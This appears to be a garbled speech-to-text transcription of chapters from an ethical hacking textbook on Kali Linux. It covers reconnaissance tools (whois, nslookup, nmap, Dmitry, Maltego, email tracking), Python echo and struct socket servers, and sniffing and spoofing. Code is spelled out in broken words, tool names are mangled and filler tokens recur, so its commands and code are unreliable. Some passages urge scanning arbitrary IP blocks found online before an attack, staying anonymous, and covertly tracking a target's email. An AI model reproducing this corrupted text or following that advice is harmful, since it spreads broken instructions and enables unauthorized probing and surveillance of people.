Information gathering. The information gathering phase of penetration testing has one specific goal. It occurs when a good penetration tester must learn as much about the client as possible. There are always many unanswered questions regarding the client. Their system must be running some software. What type of software are they using? They must comply with strict regulations regarding the usage of ports. Sometimes, the internet-facing system listens to more ports than it should. Suppose a company is going to hire you to do some internal penetration tests. In such cases, you need to know the IP address of the domain controller. Information gathering, also called intelligence gathering or reconnaissance, is the first step of the kill chain when conducting a penetration test against a data target. Note, I have already discussed a few steps of information gathering in previous chapters, but this time you will see it in a more structured and detailed way, building on what you already know with plenty of examples. Penetration testing starts with manual and automated testing. The next steps include network-focused testing, application-focused testing, and physical testing. The last part includes social engineering. This is more or less an overview of penetration testing. Registered Sanjeev Sinha 2018. Sinha, Beginning Ethical Hacking with Kali Linux. https://doi.org/1007/978-107/4842-3891-2_8. Python is present at every stage of pen testing. You can even create a virtual environment for Python so that you can add special packages that do not affect the main Python repository in your main or virtual Kali Linux. In that sense, you can increase the layers of your virtual environments. In this chapter, you will learn how to create a virtual environment for Python. You will also learn how to build an echo server using the socket library of Python. This server will not only listen to several clients, taking the information, but will also echo the messages to the client. Python virtual environment. Knowing about network security programming is extremely important. If you want to dig deep into penetration testing, to do network security programming, you need to install a virtual environment for Python. Then if you stay at the virtual environment, you can install whatever packages you want and they will not affect the main Kali Linux Python repository. Let us open the terminal of Kali Linux in VirtualBox. You need to know whether the virtual environment has already been installed on your machine. Therefore, type this command // code for knowing virtualenv version. Virtualenv version. If you do not get the version numbers, you can install it through several methods. Here is one way. // code for installing virtualenv. $sudo apt-get install python virtualenv. $sudo easy _install virtualenv. $sudo pip install virtualenv. After the installation is complete, you will see the version when issuing the command shown earlier. My version is 15.1.0. Now that the installation is complete, you can use the virtualenv command to create folders in a virtual directory. Let us create a directory. // code to create a directory for virtualenv. mkdir/virtual. Next you will use the virtualenv command, as shown here. // now we are ready to go with virtualenv. Root at Kali #virtualenv/virtual/my-server. This will give some output like this. // output after running virtualenv command. Running virtualenv with interpreter /usr/bin/python2. New Python executable in /root/virtual/my-server/bin/python2. Also creating executable in /root/virtual/myserver/bin/python. Installing setup tools, package_resources, pip, will, done. Let us see what is inside the myserver folder. // now Python is ready to work in virtual directory. Root at Kali #cd/virtual/myserver/ root at Kali/virtual/myserver #ls. bin include lib local share. As you can see, there is a bin folder. Whatever new package you install in this folder, it will not affect the main Kali Linux Python repository. Let us try to install the Python-hoi package here and see whether it works. / code of installing Python-hoi in the virtual directory. Root at Kali/virtual/myserver #cd bin / root at Kali/virtual/myserver/bin #pip install Python-hoi. Collecting Python-hoi. Downloading https://files.pythonhosted.org/packages/63/8a/8 ed 58b8b28b6200 CE1 F4E4F3BBC8B857982865B795EF511B3D68/ Python-hoi 0.7.0.tar.gz 82 KB 100% 92 KB 403 KB/s. Requirement already satisfied. Future in /usr/lib/python 2.7/ dist packages from Python-hoi. Building wheels for collected packages, Python-hoi. Running setup.py _wheel for Python-hoi, done. Stored in directory, /root/.cache/pip/wheels/06/cb/7d/3370463 2b0e1bb6446/0dc2b4dcc81up212a3d5e52up32dc531. Successfully built Python-hoi. Installing collected packages, Python-hoi. Successfully installed Python-hoi 0.7.0. The package has been installed successfully, so now the time has come to test the package. Let us run a quick hoi search. / testing the hoi package in virtual directory. Import hoi. W equals hoi.hoi, scan.map.org. Print, W. Updated _date. 2017-12-0419:16:56. February 2, 2018, 14:44 and 1 second. Status. Client transfer prohibited https://icon.org. ep #client transfer prohibited. Client transfer prohibited, https://www.icon.org. ep #client transfer prohibited. Name, domain host master. DNSSEC, unsigned. City, Seattle. / the output is a shortened version for the sake of brevity. Next, you will build an echo server using the socket library available in Python. It will help you echo data on the UDP port. In addition, tools like map will find the open ports easily, so you can use it to make your system more secure. You have already learned that a network socket is an endpoint within a node on a computer network. It is mainly used for sending or receiving data. It is a representation in the protocol stack, and it is also a form of 193. Chapter 8 Information Gathering. System Resource. That is why, in the previous code, I have sometimes used the system library. Let us open the Vim text editor on the terminal and enter the following code. / code for an echo server. Hashtag /usr/bin/python 2.7. Hashtag silence, listen to Mother Earth. underscore underscore author underscore underscore equals SS. Import socket. My sock equals socket dot socket, socket dot af underscore inet, socket dot sock underscore stream. Host equals. Port equals 2323. My sock dot bind, host, port. Could take. My sock dot listen, to. Print, I am waiting for a client. Client, IP, sock, equals my sock dot accept. Print, received connection from, IP. Print, starting our echo server object that will echo to the client. Data equals false. While len, data. Data equals client.reqv, 2048. Print, client sent this data, data. Client.send, data. Print, closing our connection after sending data to the client. Client.close. The code is not verbose. Python never uses or contains more syntax than needed. Network security programming involves two parties, a client and a server. TCP and UDP sockets are regular sockets. There are raw sockets that are used for sniffing and injection purposes. Understanding sockets is important for this reason only. They handle communication, and communication is one of the main components of penetration testing. Fundamentally, a socket offers a service. The client uses that service. A server uses a certain port, 2323 in this example, to send and receive data. The first objective is to create a socket object or instance. To do that, you pass two parameters that define the TCP services. Next, you bind that socket to a certain port. Before binding the socket object to a port, you could have taken a major step so that the port can be reusable. Usually, when you run a port, you cannot use it immediately until it has been closed. This code can solve this problem. / code for reusing a port. Hashtag creating a socket object. My sock equals socket.socket, socket.sol underscore socket, socket.so underscore reuse address. After declaring this, you can bind the port. In the listen method, you can mention the number of the clients. The echo server process runs. From this part of the code, / the while loop is open until the length of the data. While len, data. Data equals client.reqv, 2048. Print, client sent this data, data. Client.send, data. As mentioned, the port binding will keep working until the length of the data sent by the client is reached, figure 8:1, and the echo server will echo the same message to the client. Figure 8:1. The socket server is echoing the client data. An echo server is a handy little tool that will help you understand trace route in the next section. Reconnaissance tools. Blogs, news groups, and press releases are good sources for obtaining information about any organization, company, or employee. Corporate job postings may provide information about the servers or infrastructure gadgets a company uses in its network. Other important information may include internet technologies used by the company, active IP addresses, and operating systems and hardware being used by the company. All this information helps you find out more information about your target. For reconnaissance tools, one of the major purposes of them is email tracking. Email can easily be tracked. You can do it using devices that are readily available over the internet. You can track whether the recipient opens the email, whether they forward it, or whether they delete it. Most email tracker software adds a domain name with the recipient echo's email. Like this, emailaddress.readnotify.com. As strange as it might sound, a single pixel graphic file is actually Added to the recipientico's email. That file is not visible in the file. There are many tools available in the market. A few of them are free, and a few are built for professional ethical hackers. Besides www.readnotify.com, you can check out www.emailtrackerpro.com and www.mailtracking.com. Senders are notified of every action performed on the recipientico's mail, which includes opening, sending, deleting, and obviously responding. A few email tracking tools also notify you about the receiver's location. Email trackers, as well as the web spiders, are common tools in ethical hacking. In fact, reconnaissance or information gathering is incomplete without these tools. Understanding web spiders is also important. Web spiders are programs that use the @ symbol to gather information about any website, directories and files including emails. By keeping a robots.txt file in the root directory, you can stop web spiders from crawling your directories or files. Many search engines also use web spiders to make an index of files. You learned about packets when I discussed networking. Packet tracking is another major concept in reconnaissance or information gathering. Tools like NeoTrace, Visual Lookout, and Visual Trace track the travel path of packets and map them in a graphical interface while pointing to the location of routers and other devices through internetworking. Traceroute is another important packet tracking tool. How does it operate? It sends an Internet Control Message Protocol, ICMP, echo to each OC _hop echo until it reaches the destination. A hop means every router or gateway that appears along the way to its destination. Here the number of hops is important. Each hop takes some time. Calculating the time that each echo takes when coming back from a router is called time to live, TTL. Hackers can count TTL and calculate how many routers or gateways fall between the paths. Many hacking tools like SpamSpade use versions of Traceroute. The Windows operating system uses Tracert to trace the host name. Know the domain and host name. A good pen tester needs to know how a website works. You need to have basic information about a domain and host name. A uniform resource locator, URL, like www.xyz.com gives you a few basic facts about the owner. The owner of that website selects the domain name xyz.com. This means the website may be about a commercial organization since it has a .com TLD. IDECO's not mandatory that a commercial organization should always have a .com extension. However, IDECO's been a practice that has been followed since domain names were first introduced. Generally, government organizations take .gov extensions. In a country like India, this may change to .government in. You might also consider dnsstuff.com. At dnsstuff.com there are lots of tools on hand. You may check the HOI tool by entering any URL and checking the output. Now you can compare information, contact address, email address, and so on, having one from dnsstuff.com and another from your Targetoco's website. The American Registry for Internet Numbers, ARIN, is another great tool available online. Please read the HOI terms of use before proceeding. You'll learn many things about your purpose as an ethical hacker. The do's and don'ts of HOI searching are important, just like when you're doing other reconnaissance stuff. ARIN is the Internet Registry for North America only. Geographical locations outside North America have their own Internet registries. If you are from the Asia Pacific region, the Asia Pacific Network Information Center, APNIC, is your solution. Parts of Central Asia and the Middle East are covered along with Europe in RIPE NCC, and finally, LACNIC stands for Latin American and Caribbean Internet Registry. You'll find good ideas for using a HOI search from the internet. http://domaintools.com is another good tool for HOI searches. I entered the URL sanjeebzaina.wordpress.com on domain tools, and it yielded the result shown in figure 8-2. You can use this data for various purposes, including port scanning, vulnerability scanning, and more. As an ethical hacker, your goal should be to make your system strong against any outside attack. Figure 8-2. Result in domain tools. Email tracking made easy. Email tracking is part of reconnaissance. IDACO's part of information gathering. When you decide to track a target's email by using the simple tools available online, you can sign up for a 15-day trial of www.readnotify.com. The limit extends to 25 emails, to track your own email by sending messages. Figure 8-3 shows that IOCOM sending an email to my own email address. In other words, IOCOM sending email from my sanjeeb1965sinha@gmail.com account. While sending the email, I just typed the address like this: sanjeebzaina65@yahoo.co.in.readnotify.com, adding the readnotify.com extension at the end of the recipient's email address. The recipient will never see that someone added an extension at the end of his email address. It remains invisible. The Read Notify tool tracks the recipient's email while keeping you informed with alerts. Certainly, IDACO'll not give you the exact locations always. At the same time, it sometimes finds the exact position of the recipient. Email tracking is not an illegal act, and you can use the tools that are available online. Figure 8-3. Read Notify message in inbox. Another good tool is www.netcraft.com. This site basically provides internet security for its clients. Nevertheless, for passive information gathering, this site is extremely handy. You can learn many things when you search through Netcraft, and that includes a number of subdomains, operating systems used for running the servers, and so on. Figure 8-4 shows how through Netcraft IOCO searched. Figure 8-4, 4. www.netcraft.com itself. The result comprises the list of subdomains, the site report, when it was first seen, the nature of net blocking that the web site using, and finally the operating system of the server. Figure 8-4. Searching about Netcraft inside Netcraft. Searching the Internet Archive. You have probably heard about the Internet Archive, which is a place that often keeps lots of useful information about a website. The most interesting part of the archive is it includes the old looks of websites. You may want to learn how your target website looked before. For example, how did the home page look 10 or 20 years ago? This is not at all difficult as far as https://archive.org is concerned, and it works in the same way as Netcraft. It does some data mining and brings to you the older versions of a website. Figure 8-5. Figure 8-5. Google.com in the month of May 2018. Do you want to see the first look of the Google website? Well, let us go to https://archive.org/index.php and search Google first. What you see is really fun. You can get an immediate history of how many times the home pages have been saved between any given dates. Consider a range between November 11, 1998 and January 30, 2017. It says, OC pound saved 58,328 times. Between November 11, 1998, and January 30, 2017. Not only that, you may get the picture of the first day. There are clickable links, arranged chronologically. Therefore, it's not difficult to find out what sites looks like in the past. However, you are not at all interested in the aesthetic look. It's quite the opposite. You are interested in information. Many organizations publish lots of important data on their first websites by mistake, figure 8 to 6, and they usually rectify this later. This passive information may help you in your search. Organizations may have published phone numbers, names of important people associated with them, and many more things that you cannot guess. Figure 8 to 6. The first look of Google. You can check for any site this way. This is not illegal. You may compare the previous looks with the present ones and have fun. Passive information. So far, you've seen some techniques of gathering passive information. But there are still many left that are simply mind-boggling. They are simple. They are sometimes free, and sometimes they cost a few dollars. Overall, they are extremely helpful to get information about your target. One such passive information gathering tool is of course Google. Besides Google, there are other social media sites that might come in handy. It's my general assumption that organizations usually take care while posting messages or news on social media. On the contrary, individuals often remain lackadaisical in posting important information without taking any proper security measures. You might know 1, 2, or 3 prominent names in a company. But besides them, there are plenty of medium or small social media sites. You need to be diligent while searching for someone, particularly while keeping these facts in mind. Suppose you'd like to find people using Microsoft's email service, Outlook. In that case, you may start your searching in Google with @outlook.com. The thing is, collecting passive information is a kind of painstaking research. The job of a cybersecurity expert involves lots of research and knowledge of how to collect passive information. Narrowing down your searches is important. To do that, you can add a specific file. Type with any name like this, OC_Sanjeev Sinha co file type XLSX. In this type of search, you will get plenty of spreadsheet files containing Sanjeev Sinha. More searching tools are available online. A good one is https://pipel.com, where you can search by any name and location. www.zavasearch.com is also a good database of people maintained only for the US citizens. These are all helpful for finding and collecting passive information about your targets. Web spiders are crawling. You may have heard about census people or met someone who goes door to door to tally the number of people living in a country. You also might have seen the mail carrier who also travels door to door to deliver letters. When someone moves from one door to another like this, they have the opportunity to collect information about the people living inside. Web spiders do the same thing. Spammers are interested in collecting email addresses and send web spiders door to door, or website to web site, to collect data. They search words with the @ symbol, picking up email addresses and dumping them into a database. Finally, these emails are sold and used to send unsolicited emails. They don't stop at collecting emails only. Web spiders also do other things. Malicious users often try to find out the location of the target by using web spiders. They just automate the information gathering process. You can stop web crawling by putting a robots.txt file in the web root of your site. In that file, you must mention the directories that you don't Want to be crawled? There are lots of free web crawler tools available on the internet. For example, Octoparse and Cotek Web Copy are free and easy to use. They have good documentation, so just consult the instructions before using one of these tools. More about scanning. There are 3 types of scanning: port scanning, network scanning, and vulnerability scanning. Port scanning basically identifies open ports and services. When scanning determines IP addresses on a network or subnet, IDOCs known as network scanning. Finally, vulnerability scanning deals with the process that tries to discover weaknesses in a system. Each service on a system is involved with a port. Port scanning identifies what ports are open. It discovers the available TCP/IP ports and promptly gives information regarding that system. When data travels, there are 2 parties involved. One is the source, and the other is a destination. Data, while traveling, uses transport layer protocols. There are 2 known transport protocols: the transmission control protocol, TCP, and the user datagram protocol, UDP. A protocol specifies the source and destination port numbers in their headers. The port number can range from 0 to 65,535. As a reminder, port numbers can be divided into 3 parts. You may associate them with a range. Ports 0 to 1023 are the well-known ports. Next come the registered ports, which range from 1024 to 49,151. The third type are the dynamic ports, which range from 49,152 to 65,535. As a penetration tester, you must know the well-known port numbers. This includes HTTP 80, FTP 21, SMTP 25, HTTPS 443, POP3 110, Telnet 23, and many more. Network scanning is the process of identifying the active hosts on a network. Once you have found the active hosts, you may either attack or do a security assessment. This is part of network scanning. You first want to gain the knowledge of living hosts, and next you try to find out their corresponding IP addresses. Vulnerability scanning, on the other hand, proactively scans the weaknesses of a system. Initially, a vulnerability scanner tries to find out the operating system, version number, and services that may be installed. Hackers want to access the system after knowing the weaknesses. You can compare the whole scenario with a real-life war strategy. In a warlike situation or in mock fighting, one country wants to know information about the enemy country. Keeping in mind that an enemy country may target or launch a missile, you must have adequate protection. What type of protection would you like? You must make your radar system strong. Why? You must be in a position to detect any incoming threats when they really strike. Likewise, a computer network has an intrusion detection system, IDS. It usually detects all types of known incoming threats. This IDS can identify a probe. Be careful when you try to probe TCP/IP ports. The IDS can detect your probe anytime. Scanning without getting detected is a perfect challenge for a hacker. You must be able to beat the enemy radar system to strike the enemy target. Imagine the opposite scenario. As a cybersecurity specialist, you must have sufficient knowledge to guard your system. Ethical hacking is not always about being on the attack. It actually is about self-defense. You know every possible procedure of attack for one and only reason: securing your system is your first priority. Leticos conclude the scanning methodology coverage by listing the processes. 1. Check for the live system and open ports. 2. Identify the services. 3. Find out about the operating system by banner grabbing. 4. Conduct vulnerability scanning. 5. Draw a network diagrams. 6. Make preparations and attack. As you see, with vulnerability scanning, you have many things to do. Before going for a full-scale attack, you can scan a web address by typing the URL, or you can type an IP address. You may ask where you'll get IP addresses. Well, you can get them online. Google is your friend in such situations. Just type IP blocks. There are lots of websites that provide lists of IP addresses. One of them is http://www.nearsoft.net/country IP, which has IP addresses arranged according to country. Now you can click any link to get the major IP addresses of that country. If you click Panama, the range of IP addresses will open. It says OC# in the following table, you can find all major IP addresses blocks allocated. For Panama, most of these IP blocks are assigned to internet providers and hosting companies. You can click the column header in order to sort the list by another field OCO. This is a handy website that can help you in many ways. Leticos see how it can help you regarding footprinting issues. Suppose you pick up an IP address from the country Panama. Put that IP address in Ahoy search and you'll find that most of the IP addresses lack minimum security requirements. Most of the owners give full addresses, contact numbers, admin IDs, and lots of other important information that should not be disclosed in this way. By using Ahoy lookup, you can get any URL. You can do the reverse using your virtual machine Kali Linux terminal. Here is a command called anslookup. Just type it on your command line with any URL extension and you'll get the IP address. // Let's see how it works in virtual Kali Linux. Sanjeev at Kali $anslookup_scanme.nmap.org. Server 208.67.222.222. Address 208.67.222.222 #53. Non-authoritative answer. Name scanme.nmap.org. Address 45.33.32.156. At the same time I have opened my default operating system Ubuntu and typed the same command to show the difference. // Let's see how it works in host Ubuntu. Hagudu at Hagudu H81ms $1 anslookup scanme.nmap.org. Server 127.0.1.1. Address 127.0.1.1 #53. Non-authoritative answer. Name scanme.nmap.org. Address 45.33.32.156. Obviously, the machine name will be changed as two terminals represent two different operating systems. The name and IP address of scanme.nmap.org are the same, but the DNS server name and addresses are different. In the virtual machine Kali Linux, it does not show the original DNS server. Leticos hidden and anonymous because I use OpenDNS. Because of that, it shows a different DNS server address. In my default operating system Ubuntu, I am not anonymous, so it gives the local host address. The number in the second line, number 53, denotes the port for a DNS server. As I have told you, anonymity is quite a big factor in ethical hacking. You can use the Tor browser or you can change your system setup so that whenever you use any hacking tool you may remain anonymous. If you have an IP address, the reverse lookup is also simple with the ANS lookup command. Let us try that with the IP address of scanme.nmap.org. In Ubuntu first, / trying ANS lookup in the host machine. Hagudu at Hagudu H81 MS1 ANS lookup 45.33.32.156. Server 127.0.1.1. Address 127.0.1.1 #53. Non-authoritative answer 156.32.33.45. In address point ARPA. Name equals scanme.nmap.org. Authoritative answers can be found from 45.in-address.arpa. Name server equals aaron.auth.dns.ripe.net. 45.in-address.arpa. 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 r.aaron.net. Name server equals r.aaron.net. Name server equals z.aaron.net. Name server equals u.aaron.net. Name server equals x.aaron.net. Name server equals y.aaron.net. Internet address equals 199.180.180.63. u.aaron.net. Internet address equals 204.61.216.50. x.aaron.net. y.aaron.net. z.aaron.net. Internet address equals 199.71.0.63. Internet address equals 192.82.134.30. Internet address equals 199.212.0.63. aaron.auth.dns.ripe.net. Internet address equals 193.0.9.10. In Kali Linux, everything is the same except the server address. / trying ANS lookup in the virtual Kali Linux. Sanjeev at Kali $ANS lookup 45.33.32.156. Server 208.67.222.222. Address 208.67.222.222 #53. Non-authoritative answer 156.32.33.45. In address point ARPA. Name equals scanme.nmap.org. Authoritative answers can be found from 45.in-address.arpa. Name server equals y.aaron.net. 45.in-address.arpa. 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 r.aaron.net. Name server equals x.aaron.net. Name server equals z.aaron.net. Name server equals r.aaron.net. Name server equals u.aaron.net. Name server equals aaron.auth.dns.ripe.net. Internet address equals 199.180.180.63. u.aaron.net. x.aaron.net. y.aaron.net. z.aaron.net. Internet address equals 204.61.216.50. Internet address equals 199.71.0.63. Internet address equals 192.82.134.30. Internet address equals 199.212.0.63. aaron.auth.dns.ripe.net. Internet address equals 193.0.9.10. Another line is important here. 156.32.33.45. In address point ARPA. Name equals scanme.nmap.org. The IP address of scanme.nmap.org has been displayed in reverse order. 211. Chapter 8 Information Gathering. The job of scanning is not over. In fact, in a few cases, if you go deep, you'll find that some scanning may take days to complete. For the time being, you restrain your scanning to scanme.nmap.org again and try to find how many ports are open. Let us go back to map and type another command. This time it looks like this. Sanjeev at Kali $map scanme.nmap.org BV. Starting map 7.01, https://nmap.org, at February 21, 2017, 21:14 IST. Warning, hostname scanme.nmap.org resolves to 2 IPS. Using 45.33.32.156. Initiating ping scan at 21:14. Scanning scanme.nmap.org, 45.33.32.156, 2 ports. Completed ping scan at 21:14, 0.00s elapsed, 1 total hosts. Initiating parallel DNS resolution of 1 host. At 21:14. Completed parallel DNS resolution of 1 host. At 21:14, 0.00s elapsed. Initiating connect scan at 21:14. Scanning scanme.nmap.org, 45.33.32.156, 1000 ports. Discovered open port 22/TCP on 45.33.32.156. Discovered open port 25/TCP on 45.33.32.156. Discovered open port 80/TCP on 45.33.32.156. Discovered open port 53/TCP on 45.33.32.156. Discovered open port 9929/TCP on 45.33.32.156. Discovered open port 31337/TCP on 45.33.32.156. Completed connect scan at 21:15, 16.68s elapsed, 1000 total ports. Map scan report for scanme.nmap.org, 45.33.32.156. Host is up, received SYNAC, 0.30s latency. Other addresses for scanme.nmap.org, not scanned. 2600:3C01F03C91FFA18BB2F. Scanned at February 21, 2017, 21:14 and 50 seconds IST for 17 seconds. Not shown, 991 closed ports. Reason, 991 con refused. Port. State. 22/TCP. 25/TCP. 53/TCP. 80/TCP. 139/TCP. Open. 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 Service. SSH. SMTP. Domain. HTTP. Reason. SYNAC. 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 Filtered net BIOS SSN no response. 445/TCP. Filtered Microsoft DS no response. 5060/TCP filtered SIP. No response. 9929/TCP open. 31337/TCP open. NPing echo. Elite. SYNAC. SYNAC. Read data files from /usr/bin/share/nmap. Map done. 1 IP address, 1 host up, scanned in 17.74 seconds. Look at the last part of the output. There is a list that shows how many ports are open and how many ports are closed. It says 991 closed ports. Many ports are open. You can get an idea of real scanning from this example. You can find location too. Another good option available with map is the command curl. You can scan any IP address with this command. It gives you more information about this IP address, including location, organization name, city, and so on. IDECO's a kind of Hoi search, but IDECO's definitely more fruitful. The only limitation is you can scan only 1000 IP addresses per day. For a mass scan, you need a more powerful machine. Suppose you want to know the location and other information about scanme.nmap.org. Type curlipinfo.io/45.33.32.156 on your terminal, and you get an immediate result. Sanjeev at Kali $curlipinfo.io/45.33.32.156. IP 45.33.32.156. Host name, no host name. City, Fremont. Region, California. Country, US. LOC, 37.5670-121.9829. Org, as 63949 Linode, LLC. Postal, 94,536. At once, you have everything such as the city, region, postal, country, and organization name. As you can see, curl is a handy tool. Dimitri, Maltago, and other tools. Whether an organization is large or small, it is always under threat as long as it is digitally connected. As a penetration tester, you must have a clear picture of that environment. There are several tools that can help you achieve that goal. Dimitri, which stands for Deep Magic Information Gathering Tool, and Maltago are two of them. Although their working methods are different, you usually do the same thing with them. You gather as much information as possible through them. Let us first see how Dimitri works. On the top left menu of Kali Linux, you will get the long listing of information gathering tools. You will find Dimitri there. Clicking it will open the terminal. Using Dimitri is simple. Just type this on your terminal. / code of using Dimitri. DimitriGoogle.com. It will start spitting out information like this. / output from running Dimitri. Host IP 216.58.203.206. Host name Google.com. Gathered inet Hoi information for 216.58.203.206 initnum 216.46.126.0 216.99.221.255. Net name. Desk. Remarks. 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 Space. Remarks. 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 Non-ripe NCC managed address block. IPv4 address block not managed by the ripe NCC. You can find the Hoi server to query, or the IANA registry to query on this web page. http://www.iana.org/assignments/IPv4-address-. You can access databases of other REIRs at Afrinic, Africa. http://www.afrinic.net whois.afrinic.net. AFNIC, Asia Pacific. Remarks. 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 http://www.apnic.net whois.apnic.net. ARIN, Northern America. http://www.aaron.net whois.aaron.net. LACNIC, Latin America and the Caribbean. http://www.lacnic.net whois.lacnic.net. This information is incomplete for the sake of brevity. You can get information about the subdomains also. / output of the subdomains. Gathered subdomain information for google.com. Searching google.com 80. Hostname apis.google.com. Host IP 172.217.160.206. Hostname www.google.com. Host IP 172.217.166.132. Hostname pluszone.google.com. Host IP 172.217.160.206. Hostname play.google.com. Host IP 216.58.203.206. This information is incomplete for the sake of brevity. The advantages of Dimitri are many. It gathers as much information as possible about the host, and it performs a TCP port scan on the target. In the previous example, while running the scan, I got the open ports. The HOI lookup is especially complete. Along the way, it retrieves all possible uptime data, system data, and server data. You can also pipe your output to a text file and save it by issuing this command. / keeping Dimitri output in a text file. Dimitri wise Dimitri.text google.com. This will save all the output in a text file called Dimitri.text. Mall2Go, on the other hand, is more graphical and target specific. You open the software at the same place in Kali Linux, by using the applications listing. Mall2Go is also in the information gathering category. Suppose your victim is an organization and you want to know about its people. Mall2Go will come handy in such cases. It helps you track down all the people in that organization, including their email addresses, their Skype IDs, and other social media account details. To use Mall2Go, you need to have a persistent internet connection, and you need to register with the company. Once the registration part is done, you can start using Mall2Go, see Figure 8-7. Figure 8-7. The Mall2Go opening page after registration. In top left panel of Mall2Go, you get the categories, Figure 8-8. You can open any category such as personal and just can drag it on the main pane. Figure 8-8. Mall2Go graphical tools. The default is the name John Doe, but you can change this name to any name you want to query. I have changed it to my name to search for sanjeev12sinha@gmail.com. Mall2Go found the Skype ID that is attached to that particular email ID, Figure 8-9. Figure 8-9. Mall2Go is working on a target. On the right you'll find the properties tools. You can change the name and keep on searching. Mall2Go is multilayered. It offers you an unprecedented information about your target. In the infrastructure category, you can get all the domains, DNS names, netblocks, IP addresses, affiliations, and so on. For passive information, Mall2Go is unique. Since it uses Java, it can easily run on any operating system. The best part of Mall2Go is that by using the GUI you can easily see the relationships, which are instant and accurate. There are several other tools in the information gathering category. Many of them are command-based. In that sense, Mall2Go is unique, and it is really powerful as long as information gathering is concerned. In the coming chapters, you will see how this information, which you gather by using reconnaissance tools, helps you when you use other hacking tools like Wireshark or Metasploit. Summarizing the 5 phases of penetration. You have seen many examples involving information gathering. You need to gather as much information as possible about your target so that you can plan a proper penetration test. To summarize, these are the 5 phases of penetration testing. OCO building a threat model, this involves the identification of risks. OCO creating a test plan, this is the roadmap that you will follow in your penetration testing effort. This phase is important as you gather information as well as organize other resources. OCO executing, there are so many things to do depending on what type of information you have gathered, from finding vulnerabilities to implementing security. OCO creating the problem report, this report includes what you found and the types of solutions you can provide. OCO having a post-mortem of the penetration testing effort. You can analyze the malware that you have caught and other loopholes in the system. SQL mapping. In this chapter, you will take a detailed look at how you can avoid being hacked by a sniffer. In addition, you will learn how you can exploit SQL injection flaws and take over database servers. Crackers break into systems by injecting malformed SQL queries that map out the database column names. This is known as SQL mapping, with SQL injection being the technique by which they obtain this information. When you have a good grasp of SQL mapping, you can defend your system from such attacks. There are a few good sniffing tools available in Kali Linux. You can also build your own sniffing and SQL injection tool using Python OCO's library. This chapter starts with sniffing and spoofing. You will learn about the transmitted protocols and packets and how the sniffers can poison them. You will also how to prevent such sniffers. After that, you will learn what types of services are available to guard against sniffing, from database fingerprinting to data fetching from the database. Sniffing and spoofing. Suppose you are logging into a website where no encryption is used. In such a case, your username and password are vulnerable. Someone can capture the network traffic between you and the website and discover your credentials. This is sniffing. Registered Sanjeev Sinha 2018. Sinha, Beginning Ethical Hacking with Kali Linux. https://doi.org/1007/978-142-3842-3891-2_9. Spoofing, on the other hand, refers to some kind of identity change. In other words, the attacker pretends to be someone else within the network traffic. Suppose you are computer A. Nevertheless, you send a command pretending to be computer B. This is useful, for example, when you want to generate network packets to pretend to be someone else. People will think that computer A has generated this packet, but in reality, computer B actually generated it. This is an example of spoofing. In DNS spoofing, someone changes their own IP address to the victim OCO's IP address while sending a packet. OCO Sniff Joke is a Linux application that can handle your TCP connection by delaying it, modifying it, and finally injecting it with fake packets inside your transmission. OCO Kismet is a wireless network detector, sniffer, and intrusion detection system that can do many things. OCO Wireshark is another great network protocol analyzer that lets you inspect network activities at a microscopic level. The Wireshark project started in 1998, and it continues to be successful because of the contributions of networking experts throughout the world. It captures packets on the live system, but the offline analysis is available thereafter. One of the great advantages of Wireshark is its multi-platform availability. In the following sections, you will take a close look at these tools and see how they work. As usual, Python will help when you do the sniffing. Jobs. You will then learn about Scapy, a Python program that enables the user to send, sniff, dissect, and forge network packets. You can capture either packets or frames with these sniffer tools. You can also display data using these tools. Packing and unpacking with Python. In the following code, you will see how you can build a server that packs data and sends it while it is bound to a port and at the same time accepts a connecting IP address. On the other side, the client receives the packet and unpacks the data in the raw binary form. // code for server side. Hashtag /usr/bin/python 2.7. Hashtag is life really beautiful? Hashtag __author equals ss. Import socket. Import struct. Host equals 192.168.2.2. Port equals 8080. My socket equals socket.socket, socket.af_inet, socket.sock_stream. My socket.bind, host, port. My socket.listen, 1. Connection, address equals my socket.accept. Print, connected to, address. Hashtag struct pack method passes two parameters, format string and values. Message equals struct.pack, HHL, 1, 2, 3. Connection.send, message. Connection.close. Let a host try to understand the code. What is happening here exactly? Binary data is stored in files, or you can get the binary data from the network. The struct module in Python generally refers to conversations between Python and C structs, and it is represented by Python byte objects. While describing the layout of the C structs, it uses format strings. The conversion is to Python values or from Python values. You can also use format strings. In the client-side code, you usually receive the data and unpack it. // code for client-side. Hashtag /usr/bin/python 2.7. Hashtag self-control is the key. Hashtag __author equals ss. Import socket. Import struct. Host equals 192.168.2.2. Port equals 8080. Hashtag creating an inet, and raw socket. My socket equals socket.socket, socket.af_inet, socket.sock_stream. My socket.connect, host, port. Hashtag receiving buffer size. Message equals my socket.req, 1024. Print, message. Print, struct.unpack, HHL, message. My socket.close. The following is some output. / output of client side. SS at SSH81MS1 / Picarm projects / ethical Kali $Python 2.7. Unstruct.py. Hashtag 1, 2, 3. / output of server side. SS at SSH81MS1 / Picarm projects / ethical Kali $Python 2.7. Raw binary.py. Connected to 192.168.2.2 39,260. Figure 9:1 shows how this binary packet looks. Figure 9:1. What the binary packets look like. The pack method of struct returns a bytes object containing the values 1, 2, 3, it is packed according to the format string FMT. The unpack method unpacks from the buffer, and the results are displayed in a tuple, even if there is exactly one item. The following are more examples on a terminal using Python 2.7. / code of struct pack methods. SS at SSH81 MS1 Python 2.7. Python 2.7.6, default, November 23, 2017, 15 hours 49 minutes and 48 seconds. GCC 4.8.4 on Linux 2. Type help, copyright, credits or license for more information. Import struct. Struct.pack, B1. Struct.pack, I1. Struct.pack, Q1. Struct.pack, D1. Struct.pack, X1. Traceback, most recent call last. File stin, line 1, in module. Struct.error, pack expected 0 items for packing, got 1. Sometimes exceptions are thrown. For example, the string size may not match. In the following code, B stands for assigned char in C, in Python it is an integer, and the packed value in bytes is 1. Inspect this line and the output. In the next line, struct.pack, B1. The C type I represents an integer, in Python it is also an integer, and the packed value is 4 bytes. Struct.pack, I1. Please read Pythonocos documentation for further details about this. Why wireless media is vulnerable. Now you have an idea of how you can display the packet data. Some sophisticated sniffer tools can intercept this data and display it in its original form, such as an email or document. To reiterate, the term packet has a direct reference to the data at layer 3, which is also called the network layer of the OSI model. We have seen it in our OC Network Echo chapter. The term frame refers to data at layer 2, or the data link layer. Frames have MAC addresses inside them. Packets have IP addresses inside them. Usually, all host-to-host network communication is based on the TCP/IP data communications model. This model maps to the OSI model, which has 7 layers of data communication. By now, you can guess that the goal of a sniffer is to obtain important information sent from a target system. When data travels over the network, the header information is added to the beginning of the data. There are 2 types of header data: an IP header contains the source and destination IP addresses, and the MAC header contains the source and destination MAC addresses. IP addresses are necessary for routing traffic to 